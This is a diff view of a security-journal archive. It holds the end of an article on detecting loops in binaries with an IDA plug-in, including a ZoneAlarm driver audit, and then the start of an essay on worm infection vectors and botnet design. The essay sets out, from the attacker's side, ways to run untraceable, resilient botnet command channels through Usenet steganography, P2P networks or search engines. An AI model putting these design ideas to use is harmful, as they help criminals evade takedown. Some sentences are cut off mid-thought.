book Compilers: Principles, Techniques, and Tools by Alfred V. Aho, Ravi Sethi
and Jeffrey D. Ullman. In this algorithm, the authors use a technique that
consists of two components to find natural loops. (A natural loop "Has a single
entry point. The header dominates all nodes in the loop."; see
http://www-2.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s03/public/lectures/L7_handouts.pdf.)
Note that not all loops are natural loops.
|
||||
|
||||
The first component of natural loop detection is to build a dominator tree out
of the control flow graph (CFG). A control flow graph is essentially a map of
code execution with directional information. One node dominates another when
all paths from the entry node to the second node have to go through the first.
The algorithm in the book calls for the finding of all the dominators in a CFG.
Let's look at the actual algorithm.
|
||||
|
||||
Call the candidate dominator the master node and the node being tested the
slave node. Starting from the entry node, the algorithm needs to check if there
is a path to the slave from the entry node. This path has to avoid the master
node. If it is possible to get to the slave node without touching the master
node, it can be determined that the master node does not dominate the slave
node. If it is not possible to get to the slave node without touching the
master node, it is determined that the master node does dominate the slave. To
implement this routine the user would call the
is_path_to(ea_t from, ea_t to, ea_t avoid) function included in
loopdetection.cpp. This function checks whether there is a path that starts at
the parameter from, reaches the parameter to, and avoids the node specified in
avoid. Figure 1 illustrates this algorithm.
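
The dominator test described above can be sketched in a few lines of Python.
This is only an illustration and not the plug-in's C++ code: the adjacency-list
CFG, its node names and edges, and the dominates helper are assumptions made
for the example. Only the idea of an is_path_to check with an avoid node comes
from the text.

```python
# Hypothetical CFG as an adjacency list (node -> list of successors).
# The edges are an assumption chosen to resemble the A/B/C/D example
# discussed in the text; they are not taken from the original figure.
cfg = {
    "A": ["B"],
    "B": ["C", "D"],
    "C": ["D"],
    "D": ["B"],
}


def is_path_to(cfg, src, dst, avoid=None):
    """Return True if dst can be reached from src without touching avoid."""
    if src == avoid or dst == avoid:
        return False
    stack = [src]
    seen = {src}          # visited set keeps the search from looping forever
    while stack:
        node = stack.pop()
        if node == dst:
            return True
        for succ in cfg.get(node, []):
            if succ != avoid and succ not in seen:
                seen.add(succ)
                stack.append(succ)
    return False


def dominates(cfg, entry, master, slave):
    """master dominates slave if no path entry -> slave avoids master."""
    if master == slave:
        return True
    return not is_path_to(cfg, entry, slave, avoid=master)


print(dominates(cfg, "A", "B", "D"))   # B is on every path from A to D
print(dominates(cfg, "A", "C", "D"))   # A -> B -> D avoids C
```

In this sketch the avoid node is simply never pushed onto the search stack,
which is one straightforward way to model "a path that avoids the master node".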
|
||||
|
||||
As the reader can see from Figure 1, there is a loop in this CFG. The path of
nodes from B to C to D forms a loop, which will be represented as B->C->D.
There is also another loop through nodes B->D. Using the algorithm described
above it is possible to verify which of these nodes are involved in the
natural loop. The first question to ask is whether the flow of the program can
get from A to D while avoiding B. As the reader can see, it is impossible in
this case to get to D while avoiding B. As such, a call to the is_path_to
function will tell the user that B dominates D. The same holds for C, so the
results can be written as B Dom D and B Dom C: there is no way to reach C or D
without going through B. One question that might be asked is how exactly this
demonstrates a loop. The answer is that, in fact, it doesn't. The second
component of natural loop detection checks whether there is a link, or
backedge, from D to B that would allow the flow of the program to return to
node B and complete the loop. In the case of B->D there exists a backedge that
does complete the loop.
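
Putting the two components together, natural loop detection can be sketched as
follows. This is a minimal illustration under stated assumptions: the CFG edges
are a guess at the shape of the example above, and the helper names (reachable,
dominates, back_edges, natural_loop) are hypothetical, not functions from
loopdetection.cpp.

```python
# Hypothetical CFG (node -> successors); the edges are assumed for illustration.
cfg = {
    "A": ["B"],
    "B": ["C", "D"],
    "C": ["D"],
    "D": ["B"],
}


def reachable(cfg, src, avoid=None):
    """Set of nodes reachable from src (including src) without touching avoid."""
    if src == avoid:
        return set()
    seen = {src}
    stack = [src]
    while stack:
        node = stack.pop()
        for succ in cfg.get(node, []):
            if succ != avoid and succ not in seen:
                seen.add(succ)
                stack.append(succ)
    return seen


def dominates(cfg, entry, master, slave):
    """Component one: master dominates slave."""
    return master == slave or slave not in reachable(cfg, entry, avoid=master)


def back_edges(cfg, entry):
    """Component two: edges tail -> head whose head dominates the tail."""
    return [(tail, head)
            for tail, succs in cfg.items()
            for head in succs
            if dominates(cfg, entry, head, tail)]


def natural_loop(cfg, tail, head):
    """Nodes of the natural loop closed by the backedge tail -> head."""
    preds = {}
    for node, succs in cfg.items():
        for succ in succs:
            preds.setdefault(succ, []).append(node)
    body = {head, tail}
    stack = [tail] if tail != head else []
    while stack:                      # walk predecessors back up to the header
        node = stack.pop()
        for pred in preds.get(node, []):
            if pred not in body:
                body.add(pred)
                stack.append(pred)
    return body


edges = back_edges(cfg, "A")
print(edges)
print([sorted(natural_loop(cfg, t, h)) for t, h in edges])
```

With these assumed edges, the only edge whose target dominates its source is
D->B, and the loop body collected for it contains B, C and D, which matches the
two paths B->C->D and B->D sharing one backedge.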
|
||||
|
||||
|
||||
3.2) Problems with Natural Loop Detection
|
||||
|
||||
There is a very big problem with natural loops. The problem is with the
natural loop definition, which is "a single entry point whose header dominates
all the nodes in the loop". Natural loop detection does not deal with
irreducible loops, as defined previously. This problem can be demonstrated in
the accompanying figure.
|
||||
|
||||
As the reader can see, both B and D are entry points into C. Also, neither D
nor B dominates C. This throws a huge wrench into the algorithm and makes it
only able to pick up loops that fall under the specification of a natural loop
or reducible loop. It is important to note that it is next to impossible to
reproduce
|
||||
|
||||
|
||||
4) A Different Approach to Loop Detection
|
||||
|
||||
The reader has seen how to detect dominators within a CFG and how to use that
|
||||
as a component to find natural loops. The previous chapter described why
|
||||
natural loop detection was flawed when trying to detect irreducible loops. For
|
||||
binary auditing, the tool will need to be able to pick up all loops and then
|
||||
let the user deduce whether or not the loops are interesting. This chapter
|
||||
will introduce the loop algorithm used in the IDA plug-in to detect loops.
|
||||
|
||||
To come up with an algorithm that was robust enough to detect loops in both
the irreducible and reducible categories, the author decided to modify the
previous definition of a natural loop. The new definition reads "a loop can
have multiple entry points and at least one link that creates a cycle." This
definition avoids the use of dominators to detect loops in the CFG.
|
||||
|
||||
This alternative algorithm works by first making a call to the
is_reference_to(ea_t to, ea_t ref) function. The function is_reference_to will
determine if there is a reference from the ea_t specified by ref to the
parameter to. This check within the loop detection algorithm determines if
there is a backedge or link that would complete a loop. The reason this check
is done first is for speed. If there is no reference that would complete a
loop then there is no reason to call is_path_to, thus preventing unnecessary
calculations. However, if there is a link or backedge, a call to the
overloaded function is_path_to(ea_t from, ea_t to) is used to determine if the
nodes that are being examined can even reach each other. The is_path_to
function simulates all possible code execution conditions by following all
possible edges to determine if the flow of execution could ever reach the
parameter to when starting at the parameter from. The function
is_path_to(ea_t from, ea_t to) returns one (true) if there is indeed a path
going from the from node to the to node. With both of these functions
returning one, it can be deduced that these nodes are involved in a loop.
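
The two-step check can be sketched as below. The Python functions only borrow
the names is_reference_to and is_path_to from the plug-in; their bodies, the
find_loops driver, and the example CFG are assumptions made for illustration.
The example graph is a hypothetical irreducible loop: the cycle between B and C
can be entered at either node, so neither node dominates the other and a
dominator-based check would report nothing.

```python
# Hypothetical irreducible CFG: A branches to both B and C, and B <-> C cycle.
cfg = {
    "A": ["B", "C"],
    "B": ["C"],
    "C": ["B"],
}


def is_reference_to(cfg, to, ref):
    """True if there is a direct edge (reference) from ref to `to`."""
    return to in cfg.get(ref, [])


def is_path_to(cfg, src, dst):
    """True if execution starting at src could ever reach dst."""
    seen = {src}
    stack = [src]
    while stack:
        node = stack.pop()
        if node == dst:
            return True
        for succ in cfg.get(node, []):
            if succ not in seen:
                seen.add(succ)
                stack.append(succ)
    return False


def find_loops(cfg):
    """Return (to, ref) pairs where the edge ref -> to closes a cycle."""
    loops = []
    for ref in cfg:
        for to in cfg:
            # Cheap edge test first; the path search runs only when needed.
            if is_reference_to(cfg, to, ref) and is_path_to(cfg, to, ref):
                loops.append((to, ref))
    return loops


print(find_loops(cfg))
```

Here both edges of the B/C cycle are reported, while the edges leaving A are
not, because nothing leads back to A.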
|
||||
|
||||
|
||||
4.1) Problems with new approach
|
||||
|
||||
Every algorithm can have small problems that make it far from optimal, and the
new approach presented above is no exception. The algorithm has not been
optimized for performance. It runs in O(N^2) time, which carries quite a load
if there are more than 600 or so nodes.
|
||||
|
||||
The reason that the algorithm is so time consuming is that the is_path_to
function, which computes all possible paths to and from a given node, was
implemented as a Depth First Search (DFS) instead of a Breadth First Search
(BFS). As implemented, this search is much more expensive than a Breadth First
Search that visits each node only once, and because of that the algorithm may
in some rare cases suffer. If the reader is interested in how to implement a
more efficient algorithm for finding the dominators, the reader should check
out Advanced Compiler Design and Implementation by Steven S. Muchnick.
|
||||
|
||||
|
||||
It should be noted that optimizations will be made to the code in future
versions of this plug-in. The optimizations will specifically deal with
implementing a Breadth First Search instead of the Depth First Search, as well
as other small optimizations.
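
As a rough idea of what such a reachability check could look like, here is a
minimal Breadth First Search sketch. It is not the plug-in's code: the function
name is_path_to_bfs, the adjacency-list CFG and its node names are assumptions.
Because every node is marked as seen when it is queued, each node and edge is
handled at most once per query.

```python
from collections import deque

# Hypothetical CFG (node -> successors), assumed for illustration only.
cfg = {
    "A": ["B"],
    "B": ["C", "D"],
    "C": ["D"],
    "D": ["B", "E"],
    "E": [],
}


def is_path_to_bfs(cfg, src, dst):
    """Breadth-first reachability: True if dst can be reached from src."""
    queue = deque([src])
    seen = {src}                      # nodes already queued are never re-queued
    while queue:
        node = queue.popleft()
        if node == dst:
            return True
        for succ in cfg.get(node, []):
            if succ not in seen:
                seen.add(succ)
                queue.append(succ)
    return False


print(is_path_to_bfs(cfg, "A", "E"))
print(is_path_to_bfs(cfg, "E", "A"))
```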
|
||||
|
||||
|
||||
5) Loop Detection Using IDA Plug-ins
|
||||
|
||||
In every algorithm and theory there exist small problems. It is important to
understand the algorithm presented
|
||||
|
||||
The plug-in described in this document uses the Function Analyzer class
(functionanalyzer) that was developed by Pedram Amini
(http://labs.idefense.com) as the base class. The Loop Detection
(loopdetection) class uses inheritance to glean its attributes from Function
Analyzer. The reason inheritance is used is primarily for ease of development.
Inheritance is also used so that instead of having to re-add functions to a new
version of Function Analyzer, the user only has to replace the old file. The
final reason inheritance is used is for code conformity, which is accomplished
by creating virtual functions. These virtual functions allow the user to
override methods that are implemented in Function Analyzer. This means that if
a user understands the structure of Function Analyzer, they should not have a
hard time understanding Loop Detection's structure.
|
||||
|
||||
|
||||
5.1) Plug-in Usage
|
||||
|
||||
To best utilize this plug-in the user needs to understand its features and
capabilities. When a user runs the plug-in they will be prompted with the
options window shown in the figure. Each of the options in that window is
described individually below.
|
||||
|
||||
|
||||
Graph Loop
|
||||
|
||||
This feature will visualize the loops, marking the entry of a loop with a green
border, the exit of a loop with a red border and a loop node with a yellow
border.

Highlight Function Calls

This option allows the user to highlight the background of any function call
made within the loop. The highlighting is done within IDA View.
|
||||
|
||||
|
||||
Output Stack Information
|
||||
|
||||
This feature is only available together with the Graph Loop option. When this
option is enabled the graph will contain information about the stack of the
function, including each variable's name, whether or not it is an argument, and
the size of the variable. This option is a great feature for static auditing.
|
||||
|
||||
|
||||
Highlight Code
|
||||
|
||||
This option is very similar to Highlight Function Calls, except that instead of
just highlighting function calls within loops it will highlight all the code
that is executed within the loops. This makes it easier to read the loops in
IDA View.
|
||||
|
||||
|
||||
Verbose Output
|
||||
|
||||
This feature allows the user to see how the program is working and will give
|
||||
more information about what the plug-in is doing.
|
||||
|
||||
|
||||
Auto Commenting
|
||||
|
||||
This option adds comments to loop nodes, such as where the loop begins, where
it exits, and other useful information so that the user doesn't have to
continually look at the graph.
|
||||
|
||||
|
||||
All Loops Highlighting of Functions
|
||||
|
||||
This feature will find every loop within the IDA database. It will then
|
||||
highlight any call to any function within a loop. The highlighting is done
|
||||
within the IDA View making navigation of code easier.
|
||||
|
||||
|
||||
All Loops Highlighting of Code
|
||||
|
||||
This option will find every loop within the database. It will then highlight
|
||||
all segments of code involved in a loop. The highlighting of code will allow
|
||||
for easier navigation of code within the IDA View.
|
||||
|
||||
|
||||
Natural Loops
|
||||
|
||||
This detection feature allows the user to only see natural loops. It may not
|
||||
pick up all loops but is an educational implementation of the previously
|
||||
discussed algorithm.
|
||||
|
||||
|
||||
Recursive Function Calls
|
||||
|
||||
This detection option will allow the user to see where recursive function calls
|
||||
are located.
|
||||
|
||||
|
||||
5.2) Known Issues
|
||||
|
||||
There are a couple of known issues with this plug-in. It does not deal with
rep* instructions, nor does it deal with mov** instructions that might result
in copied buffers. Future versions will deal with these instructions, but since
the plug-in is open source the user can make changes as they see fit. Another
issue is that of "no-interest". By this the author means detecting loops that
aren't of interest or don't pose a security risk. These loops, for example, may
be just counting loops that don't write memory. Halvar Flake describes this
topic in the talk he gave at Blackhat Windows 2004. Feel free to read his paper
and make changes accordingly. The author will also update the plug-in with
these options at a later date.
|
||||
|
||||
|
||||
5.3) Case Study: Zone Alarm
|
||||
|
||||
For a case study the author chose Zone Alarm's vsdatant.sys driver. This
driver does a lot of the dirty work for Zone Alarm such as packet filtering,
application monitoring, and other kernel level duties. Some may wonder why it
would be worthwhile to find loops in a driver. In Zone Alarm's case, the user
can hope to find miscalculations in lengths where a signed value was not
properly converted to an unsigned value, which may cause an overflow when
looping. Any time an application takes in remote data that may be type cast at
some point, there is a good chance of finding loops that overflow their bounds.
|
||||
|
||||
When analyzing the Zone Alarm driver the user needs to select certain options
to get a better idea of what is going on with loops. First, the user should
select Verbose Output and All Loops Highlighting of Functions to see if there
are any dangerous function calls within the loops. This is illustrated in the
accompanying figure.
|
||||
|
||||
After running through the loop detection phase, some interesting results are
found; they are shown in the accompanying figure.
|
||||
|
||||
Visiting the address 0x00011a21 in IDA shows the loop. To begin, the reader
|
||||
will need to find the loop's entry point, which is at:
|
||||
|
||||
.text:00011A1E jz short loc_11A27
|
||||
|
||||
At the loop's entry point, the reader will notice:
|
||||
|
||||
.text:00011A27    push    206B6444h               ; Tag
.text:00011A2C    push    edi                     ; NumberOfBytes
.text:00011A2D    push    1                       ; PoolType
.text:00011A2F    call    ebp                     ; ExAllocatePoolWithTag
|
||||
|
||||
At this point, the reader can see that every time the loop passes through its
|
||||
entry point it will allocate memory. To determine if the attacker can cause a
|
||||
double free error, further investigation is needed.
|
||||
|
||||
.text:00011A31    mov     esi, eax
.text:00011A33    test    esi, esi
.text:00011A35    jz      short loc_11A8F
|
||||
|
||||
If the memory allocation within the loop fails, the loop terminates correctly.
|
||||
The next call in the loop is to ZwQuerySystemInformation which tries to acquire
|
||||
the SystemProcessAndThreadsInformation.
|
||||
|
||||
.text:00011A46    mov     eax, [esp+14h+var_4]
.text:00011A4A    add     edi, edi
.text:00011A4C    inc     eax
.text:00011A4D    cmp     eax, 0Fh
.text:00011A50    mov     [esp+14h+var_4], eax
.text:00011A54    jl      short loc_11A1C
|
||||
|
||||
This part of the loop is quite uninteresting. In this segment the code
increments a counter in eax and branches back to the top of the loop for as
long as the counter is less than 15 (0Fh). It is obvious that it is not
possible to cause a double free error in this case because the user has no
control over the loop condition or data within the loop. This ends the
investigation into a possible double free error.
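
To make the bound on this loop concrete, the control flow visible in the
listings can be modeled roughly as follows. This is a sketch under several
assumptions, not a decompilation of vsdatant.sys: the counter is assumed to
start at zero, the initial buffer size is a made-up parameter, and the
query_succeeds callback is a hypothetical stand-in for whatever check the
driver performs on the result of ZwQuerySystemInformation. The 32-bit width of
edi is ignored.

```python
def requested_sizes(initial_size, query_succeeds, limit=0x0F):
    """Model the retry loop: allocate, query, double the size, retry.

    initial_size and query_succeeds are hypothetical inputs; only the
    doubling (add edi, edi), the counter increment (inc eax) and the
    comparison against 0Fh (cmp / jl) come from the listing.
    """
    sizes = []
    size = initial_size
    counter = 0                       # assumed initial value of var_4
    while True:
        sizes.append(size)            # ExAllocatePoolWithTag(..., size, ...)
        if query_succeeds(size):
            break
        size += size                  # add edi, edi
        counter += 1                  # inc eax
        if not counter < limit:       # cmp eax, 0Fh / jl short loc_11A1C
            break
    return sizes


# Worst case for the model: the query never succeeds.
worst = requested_sizes(0x1000, lambda size: False)
print(len(worst), hex(worst[-1]))

# A query that succeeds once the buffer is large enough ends the loop early.
print(requested_sizes(0x1000, lambda size: size >= 0x4000))
```

In this model neither the number of iterations nor the sizes depend on anything
other than the starting size and the query result, which is the property the
analysis above relies on.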
|
||||
|
||||
Above is a good example of how to analyze loops that may be of interest. With
|
||||
all binary analysis it is important to not only identify dangerous function
|
||||
calls but to also identify if the attacker can control data that might be
|
||||
manipulated or referenced within a loop.
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
During the course of this paper, the reader has had a chance to learn about the
different types of loops and some of the methods of detecting them. The reader
has also gotten an in-depth view of the new IDA plug-in released with this
article. Hopefully now when the reader sees a loop, whether in source code or
in a binary, the reader can explore the loop and determine whether or not it is
a security risk.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Tarjan, R. E. 1974. Testing flow graph reducibility.
J. Comput. Syst. Sci. 9, 355-365.
|
||||
|
||||
Sreedhar, Vugranam, Guang Gao, Yong-Fong Lee. Identifying
|
||||
loops using DJ graphs.
|
||||
http://portal.acm.org/citation.cfm?id=236114.236115
|
||||
|
||||
Flake, Halvar. Automated Reverse Engineering.
|
||||
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-flake.pdf
|
572
uninformed/1.5.txt
Normal file
|
@ -0,0 +1,572 @@
|
|||
Social Zombies - Aspects of Trojan Networks
|
||||
May, 2005
|
||||
warlord
|
||||
warlord / nologin.org
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
|
||||
While I'm sitting here and writing this article, my firewall is
|
||||
getting hammered by lots and lots of packets that I never asked for.
|
||||
How come? In the last couple of years we saw the internet grow into
|
||||
a dangerous place for the uninitiated, with worms and viruses
|
||||
looming almost everywhere, often times infecting systems without
|
||||
user interaction. This article will focus on the subclass of malware
|
||||
commonly referred to as worms, and introduce some new ideas to the
|
||||
concept of worm networks.
|
||||
|
||||
2) Worm Infection Vectors
|
||||
|
||||
|
||||
The worms around today can mostly be put into one of the four
categories discussed in the following sections.
|
||||
|
||||
2.1) Mail
|
||||
|
||||
The mail worm is the simplest type of worm. Its primary
mode of propagation is through social engineering. Large quantities
of mail with content that deceives people and/or triggers their
curiosity trick recipients into running an attached program. Once
executed, the program will send out copies of itself via email to
recipients found in the victim's address book. This type of worm is
usually stopped quickly when antivirus companies update their
signature files, and mail servers running those AV products start
filtering the worm mails out. Users, in general, are becoming more
and more aware of this type of malware, and many won't run
attachments sent in mail anymore. Regardless, this method of
infection still manages to be successful.
|
||||
|
||||
|
||||
2.2) Browser
|
||||
|
||||
Browser-based worms, which primarily work against Internet Explorer,
|
||||
make use of vulnerabilities that exist in web-browsers. What
|
||||
generally happens is that when a user visits a malicious website,
|
||||
an exploit will make Internet Explorer download and execute code. As
|
||||
there are well known vulnerabilities in Internet Explorer at all
|
||||
times that are not yet fixed, the bad guys usually have a couple of
|
||||
days or weeks to spread their code. Of course, the infection rate
|
||||
heavily depends on the number of visitors on the website hosting the
|
||||
exploit. One approach that has been used in the past to gain access
|
||||
to a wider 'audience' involved sending mail to thousands of users in
|
||||
an attempt to get the users to visit a malicious website. Another
|
||||
approach involved hacking advertisement companies and changing their
|
||||
content in order to make them serve exploits and malware on high
|
||||
profile sites.
|
||||
|
||||
|
||||
2.3) Peer to Peer
|
||||
|
||||
The peer to peer worm is quite similar to the mail worm; it's all
about social engineering. Users hunting for the latest mp3s or
pictures of their most beloved celebrity find similarly named
programs and scripts that try to deceive them into downloading and
executing them. Once active on the user's system, the malcode will
make sure it's being hosted by the user's p2p application so that it
can spread further. Even if such a file is downloaded, host-based
anti-virus scanners with recent signatures will catch most of these
programs before they can be run.
|
||||
|
||||
|
||||
2.4) Active
|
||||
|
||||
This one is the most dangerous worm, as it doesn't require any sort
|
||||
of user interaction at all. It also requires the highest level of
|
||||
skill to write. Active worms spread by scanning the internet for one
|
||||
or more types of vulnerabilities. Once a vulnerable target is
|
||||
found, an exploit attempt is made that, if successful, results in
|
||||
the uploading of the worm to the attacked site where propagation can
|
||||
continue in the same form. These worms are usually spotted first by
|
||||
an increasing number of hosts scanning the internet, most often
|
||||
scanning for a single port. These worms also usually exploit
|
||||
weaknesses that are well-known to the public for hours, days, weeks
|
||||
or months. Examples of this type of worm include the Wank worm,
|
||||
Code Red, Sadmind, SQL Slammer, Blaster, Sasser and others. As the
|
||||
use of firewalls and NAT routers increases, and as anti-exploit
|
||||
techniques like the one employed by Windows XP SP2 become more
|
||||
common, these worms will find fewer hosts to infect. As of this
writing, it's been a while since the last big active worm hit the
net.
|
||||
|
||||
|
||||
Other active infection vectors include code spreading via unset or
weak passwords on CIFS shares (CIFS is the Common Internet File
System, the protocol used to exchange data between Windows hosts via
network shares), IRC and instant messaging networks, Usenet, and
virtually every other data exchange protocol.
|
||||
|
||||
3) Motives
|
||||
|
||||
3.1) Ego
|
||||
|
||||
Media attention is often a major motivation behind a worm. Quite
often, coders seem to bolster their ego by seeing reports on their
worm on major sites on the internet as well as on TV news and in
newspapers, with panicked warnings of the latest doomsday threat
which may take down the planet and result in a 'Digital Pearl
Harbor'. Huge media attention usually also means huge law
enforcement attention, and big efforts will be made to catch the
perpetrator. Though wide open (public) WIFI networks in particular
can make it quite difficult to catch the perpetrator by
technological means, people boasting on IRC and, as in the case of
Sasser, bounties can quickly result in the worm's author being taken
into custody.
|
||||
|
||||
|
||||
3.2) DDoS
|
||||
|
||||
The reason for a DDoS botnet is usually either the wish to have
|
||||
enough firepower to virtually shoot people/sites/organizations off
|
||||
the net, or extortion, or a combination of both. The extortion of
|
||||
gambling websites before big sports events is just one example of
|
||||
many cases of extortion involving DDoS. The attacker usually takes
|
||||
the website down for a couple of hours to demonstrate his ability to
|
||||
do so whenever it pleases him, and sends a mail to the owner of the
|
||||
website, asking for money to keep the firepower away from his site.
|
||||
This sort of business model has been well known for millennia, and
has merely found new applications online.
|
||||
|
||||
|
||||
3.3) Spamming
|
||||
|
||||
This one is also about money in the end. Infected machines are
|
||||
(ab)used as spam zombies. Each machine sends their master's
|
||||
unsolicited mail to lots and lots of unwilling recipients. The
|
||||
owners of these systems usually offer their services to the spam
industry and thus make money off it.
|
||||
|
||||
|
||||
3.4) Adware
|
||||
|
||||
Yet another reason involving money. Just like on TV and Google,
|
||||
advertisements can be sold. The more people see the advertisement,
the more money can be requested from the people that pay for their
slogan to be displayed on some end user's Windows system. (Of
course, it could be Linux and MacOS too, but, face it, no adware
attacks those.)
|
||||
|
||||
|
||||
3.5) Hacking
|
||||
|
||||
A worm that infects and backdoors a couple thousand hosts is a great
way to quickly and easily obtain data from those systems. Examples
of data that may be worth stealing include accounts for online
games, credit card numbers, personal information that can be used in
identity theft scams, and more. There has even been a report of
items from online games being stolen in order to sell them later on
eBay. Of course, once one machine has been compromised, extending
that foothold further into the network can be much easier. Take for
example the case of a heavily firewalled company. A hacker can't get
inside using an active approach, but notices that one of his malware
serving websites infected a host within that network. Using a
connect-back approach, where the infected node connects to the
attacker, a tunnel can be built through the firewall, thereby
allowing the attacker to reach the internal network.
|
||||
|
||||
4) Botnets
|
||||
|
||||
While I did mention DDoS and spam as reasons for infection already,
|
||||
what I left out so far was the infrastructure of hundreds or
|
||||
thousands of compromised machines, which is usually called a
|
||||
botnet. Once a worm has infected lots of systems, an
|
||||
attacker needs some way to control his zombies. Most often the nodes
|
||||
are made to connect to an IRC server and join a (password protected)
|
||||
secret channel. Depending on the malware in use, the attacker can
|
||||
usually command single or all nodes sitting on the channel to, for
|
||||
example, DDoS a host into oblivion, look for game CD keys and dump
|
||||
those into the channel, install additional software on the infected
|
||||
machines, or do a whole lot of other operations. While such an
|
||||
approach may be quite effective, it has several shortcomings.
|
||||
|
||||
- IRC is a plaintext protocol.
|
||||
|
||||
Unless every node builds an SSL tunnel to an SSL-capable IRCD,
|
||||
everything that goes on in the channel will be sent from the IRCD to
|
||||
all nodes connected, which means that someone sniffing from an
|
||||
infected honeypot can see everything going on in the channel,
|
||||
including commands and passwords to control the botnet. Such a
|
||||
weakness allows botnets to be stolen or destroyed (for example, by
issuing a command to make them connect to a new IRCD which is on IP
127.0.0.1).
|
||||
|
||||
- It's a single point of failure.
|
||||
|
||||
What if the IRCD goes down because some victim contacted the admin
|
||||
of the IRC server? On top of this, an IRC Op (an IRC administrator)
|
||||
could render the channel inaccessible. If an attacker is left
|
||||
without a way to communicate with all of the zombie hosts, they
|
||||
become useless.
|
||||
|
||||
A way around this dilemma is to make use of dynamic DNS sites like
|
||||
www.dyndns.org. Instead of making the zombies connect to
|
||||
irc.somehost.com, the attacker can install a dyndns client which
|
||||
then allows drones to reference a hostname that can be directed to a
|
||||
new address by the attacker. This allows the attacker to migrate
|
||||
zombies from one IRC server to the next without issue. Though this
|
||||
solves the problem of reliability, IRC should not be considered
|
||||
secure enough to operate a botnet successfully.
|
||||
|
||||
|
||||
The question, then, is what is a better solution? It seems the
|
||||
author of the trojan Phatbot already tried to find a way
|
||||
around this problem. His approach was to include peer to peer
|
||||
functionality in his code. He ripped the code of the P2P project
|
||||
``Waste'' and incorporated it into his creation. The problem was,
|
||||
though, that Waste itself didn't include an easy way to exchange
|
||||
cryptographic keys that are required to successfully operate the
|
||||
network, and, as such, neither did Phatbot. The author is not aware
|
||||
of any case where Phatbot's P2P functionality was actually used.
|
||||
Then again, considering people won't run around telling everyone
|
||||
about it (well, not all of them at least), it's possible that such a
|
||||
case is just not publicly known.
|
||||
|
||||
|
||||
Keeping a botnet up and running requires reliability,
|
||||
authentication, secrecy, encryption and scalability. How can all of
|
||||
those goals be achieved? What would the basic functionality of a
|
||||
perfect botnet require? Consider the following points:
|
||||
|
||||
- An easy way to quickly send commands to all nodes
|
||||
- Untraceability of the source IP address of a command
|
||||
- Impossibility of judging from an intercepted command packet which node it
  was addressed to
|
||||
- Authentication schemes to make sure only authorized personnel operate the
|
||||
zombie network
|
||||
- Encryption to conceal communication
|
||||
- Safe software upgrade mechanisms to allow for functionality enhancements
|
||||
- Containment; so that a single compromised node doesn't endanger the entire
|
||||
network
|
||||
- Reliability; to make sure the network is still up and running when most of
|
||||
its nodes have gone
|
||||
- Stealthiness on the infected host as well as on the network
|
||||
|
||||
At this point one should distinguish between unlinked and
|
||||
linked, or passive, botnets. Unlinked means each node is on
|
||||
its own. The nodes poll some central resource for information.
|
||||
Information can include commands to download software updates, to
|
||||
execute a program at a certain time, or the order a DDoS on a given
|
||||
target machine. A linked botnet means the nodes don't do anything by
|
||||
themselves but wait for command packets instead. Both approaches
|
||||
have advantages and disadvantages. While a linked botnet can react
|
||||
faster and may be more stealthy considering the fact that it doesn't
|
||||
build up periodic network connections to look out for commands, it
|
||||
also won't work for infected nodes sitting behind firewalls. Those
|
||||
nodes may be able to reach a website to look for commands, which
|
||||
means an unlinked approach would work for them, but command packets
|
||||
like in the linked approach won't reach them, as the firewall will
|
||||
filter those out. Also, consider the case of trying to build up a
|
||||
botnet with the next Windows worm. Infected Windows machines are
|
||||
generally home users with dynamic IP addresses. End-user machines
|
||||
change IPs regularly or are turned off because the owner is at work
|
||||
or on a hunting weekend. Good luck trying to keep an up-to-date list
|
||||
of infected IPs. So basically, depending on the purpose of the
|
||||
botnet, one needs to decide which approach to use. A combination of
|
||||
both might be best. The nodes could, for example, poll a resource of
|
||||
information once a day, where commands that don't require immediate
|
||||
attention are waiting for them. On the other hand if there's
|
||||
something urgent, sending command packets to certain nodes could
|
||||
still be an option. Imagine a sort of unlinked botnet. No node knows
|
||||
about another node, nor does it ever contact one of its brothers,
|
||||
which perfectly achieves our goal of containment. These nodes
|
||||
periodically contact what the author has labeled a resource
|
||||
of information to retrieve their latest orders. What could such a
|
||||
resource look like?
|
||||
|
||||
The following attributes are desirable:
|
||||
|
||||
- It shouldn't be a single point of failure, like a single host that makes
|
||||
the whole system break down once it's removed.
|
||||
- It should be highly anonymous, meaning connecting there shouldn't be
|
||||
suspicious activity. To the contrary, the more people requesting information
|
||||
from it the better. This way the nodes' connections would vanish in the
|
||||
masses.
|
||||
- The system shouldn't be owned by the botnet master. Anonymity is one of the
|
||||
botnet's primary goals after all.
|
||||
- It should be easy to post messages there, so that commands to the botnet can
|
||||
be sent easily.
|
||||
|
||||
There are several options to achieve these goals. It could be:
|
||||
|
||||
- Usenet: Messages posted to a large newsgroup which contain
|
||||
steganographically hidden commands that are cryptographically signed
|
||||
achieve all of the above-mentioned goals.
|
||||
- P2P networks: The nodes link to a server once in a while and, like hundreds
|
||||
of thousands of other people, search for a certain term (``xxx''), and find
|
||||
command files. File size could be an indicator for the nodes that a certain
|
||||
file may be a command file.
|
||||
- The Web itself: This one would potentially be slow, but of course it's also
|
||||
possible to set up a website that includes commands, and register that site
|
||||
with a search engine. To find said site, the zombies would connect to the
|
||||
search engine and submit a keyword. A special title of the website would
|
||||
make it possible to identify the right page among thousands of other hits
|
||||
on the keyword, without visiting each of them.
|
||||
|
||||
|
||||
|
||||
Using those methods, it would be possible to administer even large
|
||||
botnets without even having to know the IP addresses of the nodes.
|
||||
The ``distance'' between botnet owner and botnet drone would be as
|
||||
large as possible since there would be no direct connection between
|
||||
the two. These approaches also face several problems, though:
|
||||
|
||||
|
||||
How would the botnet master determine the number of infected hosts
|
||||
that are up and running? Only in the case of the website would
|
||||
estimation of the number of nodes be possible by inspecting the
|
||||
access logs, and even then only if logging were enabled. In the case of the
|
||||
Usenet approach a command of ``DDoS Ebay/Yahoo/Amazon/CNN'' might
|
||||
just reach the last 5 remaining hosts, and the attacker would only
|
||||
be left with the knowledge that it somehow didn't work. The problem
|
||||
is, however, that the attacker would not know the number of zombies
|
||||
that would actually take part in the attack. The same problem occurs
|
||||
with the type and location of the infected hosts. Some might be high
|
||||
profile, such as those connecting from big corporations, game
|
||||
developers, or financial institutions. The attacker might be
|
||||
interested in abusing those for something other than Spam and DDoS,
|
||||
if he knew about them in particular. If the attacker wants to bounce
|
||||
his connections over 5 of his compromised nodes to make sure he
|
||||
